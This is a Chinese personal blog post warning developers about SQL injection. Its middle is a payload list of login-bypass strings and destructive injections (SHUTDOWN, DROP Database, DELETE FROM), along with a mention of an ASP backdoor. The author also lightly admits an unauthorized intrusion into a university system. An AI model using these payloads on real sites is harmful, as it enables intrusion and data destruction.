哦!爸 的小日記

每當有重大新聞時事之後，過幾天都會有新聞播放某某網站被駭客侵入，

被改網頁內容，會員資料外流也有總統府網站花了七百萬建置可是還是被更改資料和入侵，

SQL INJECTION  這個詞已經不是新名詞，

但是身為開發人員你了解您的系統嗎? 和如何防範嗎?

http://www.governmentsecurity.org/articles/sql-injection-basic-tutorial.html

admin'-- 

' or 0=0 -- 

" or 0=0 -- 

or 0=0 -- 

' or 0=0 # 

" or "a"="a 

') or ('a'='a 

") or ("a"="a 

hi" or "a"="a 

hi" or 1=1 -- 

hi' or 1=1 -- 

hi' or 'a'='a 

hi') or ('a'='a 

hi") or ("a"="a 

' ;SHUTDOWN--

' ;DROP Database <資料庫名稱>--

' ;DROP Table <資料表名稱>--

' ;Truncate Table <資料表名稱>--

' ;DELETE FROM <資料表名稱>--

利用 Scripting.FileSystemObject 物件來建立一個 ASP 網頁後門

xp_availablemedia ;

xp_terminate_process;

這些語句有些人一看就明白有些人並不明白，

以上的SQL 碼上網找找都有，並沒有什麼大不了，

小弟我幾年前也'不小心'進了嘉X大學(OS.. 這可以說嗎..我會被告嗎..)的系統裡，

安全漏洞另人掉下巴... (因為我只是在URL 改東改西就進去了...)

但我知道走過必留下痕跡的道理，所以看看就離開了，

本來想打電話去和他們說但想想算了..

但其實駭客最主要是透過

1.INJECTION 語法讓網站或系統出現錯誤訊息再從錯誤訊息中知道資料庫結構內容，

再進一步入侵

2.和程式給予帳號過大權限導致一但入侵就無所不能，

3.或是在前端直接和欄位組合SQL語法

4.錯誤訊息內容直接顯示給使用者

所以身為資訊人員，雖然我們常聽到駭客改了某某網站的內容讓人發笑之外，

如果有一天您的系統被入侵我想也笑不出來吧...

所以快去了解一下相關資料吧...